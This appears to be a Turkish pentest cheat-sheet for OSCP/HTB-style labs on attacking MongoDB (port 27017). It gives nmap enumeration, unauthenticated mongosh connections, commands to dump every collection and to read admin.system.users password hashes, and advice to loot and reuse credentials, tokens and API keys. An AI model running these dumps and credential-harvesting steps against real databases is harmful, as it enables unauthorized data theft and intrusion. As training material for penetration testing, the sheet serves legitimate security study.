FOOTHOLD Metodoloji Cheat-sheet
27017

MongoDB

linux

MongoDB (cogunlukla kimlik dogrulamasiz): mongosh ile baglanip DB/collection dump, hassas veri loot, surum-bazli CVE.

┌──

Komutlar

nmap ✓ EXAM-SAFE
nmap -sV -p {{RPORT}} --script=mongodb-info,mongodb-databases {{RHOST}}
MongoDB surum tespiti ve kimlik dogrulamasiz DB listeleme. HackTricks — 27017 Pentesting MongoDB
mongosh ✓ EXAM-SAFE
mongosh mongodb://{{RHOST}}:{{RPORT}}
Kimlik dogrulamasiz mongosh baglantisi. HackTricks — 27017 Pentesting MongoDB
mongosh ✓ EXAM-SAFE
mongosh mongodb://{{USER}}:{{PASS}}@{{RHOST}}:{{RPORT}}/admin
Kimlik dogrulamali mongosh baglantisi. HackTricks — 27017 Pentesting MongoDB
mongosh ✓ EXAM-SAFE
mongosh mongodb://{{RHOST}}:{{RPORT}} --eval 'db.adminCommand({listDatabases:1})'
Tum veritabanlarini listele. MongoDB Manual — mongosh
mongosh ✓ EXAM-SAFE
mongosh mongodb://{{RHOST}}:{{RPORT}}/DBNAME --eval 'db.getCollectionNames().forEach(c=>printjson(db[c].find().toArray()))'
Bir DB icindeki tum collection'lari dump et. HackTricks — 27017 Pentesting MongoDB
mongo ✓ EXAM-SAFE
mongo {{RHOST}}:{{RPORT}}/admin --eval 'db.system.users.find()'
system.users koleksiyonundan kullanici/hash bilgisi cek. HackTricks — 27017 Pentesting MongoDB

Genel Bakis

MongoDB OSCP/HTB makinelerinde cogunlukla kimlik dogrulamasiz (bind 0.0.0.0, no auth) yapilandirilmis olarak bulunur. Bu durumda dogrudan baglanip tum collection’lari dump etmek mumkundur; asil amac uygulama kullanici kredleri ve hassas veri loot etmektir.

Enumeration

  • nmap mongodb-info ve mongodb-databases scriptleri auth olup olmadigini ve DB listesini gosterir.
  • Modern istemci mongosh, eski makinelerde mongo. Surum onemli: 2.x-3.x’te bazi authentication bypass / CVE’ler mevcut.
  • Baglandiktan sonra show dbs, use <db>, show collections, db.<col>.find() ile gez.

Kimlik Dogrulama

  • Cogu zaman auth gerekmez. Auth varsa admin DB’sine mongodb://user:pass@host/admin ile baglan.
  • Uygulama config dosyalarindan (.env, config.js) elde edilen connection string’ler kred kaynagidir.

Loot

  • Uygulama DB’lerindeki users collection’larinda parola/hash ara; bunlari web/SSH icin tekrar kullan.
  • admin.system.users MongoDB’nin kendi kullanicilarini ve SCRAM hash’lerini tutar.
  • Dump edilen verileri (token, API key, oturum) sonraki adimlar icin sakla.

Notlar

  • MongoDB’de dogrudan OS RCE nadirdir; deger loot ve pivot odaklidir.
  • NoSQL injection (PayloadsAllTheThings) bir web uygulamasi MongoDB kullaniyorsa auth bypass icin ayrica degerlendirilir.
┌──

İlgili teknikler

Linux PrivEsc Enumeration Metodolojisi (linpeas / LinEnum / pspy / Manuel Checklist)Servis Exploit & Varsayılan Kimlik Bilgisi İş Akışı
┌──

Kaynaklar

↗ HackTricks — 27017 Pentesting MongoDB↗ MongoDB Manual — mongosh↗ PayloadsAllTheThings — NoSQL Injection
0/15 set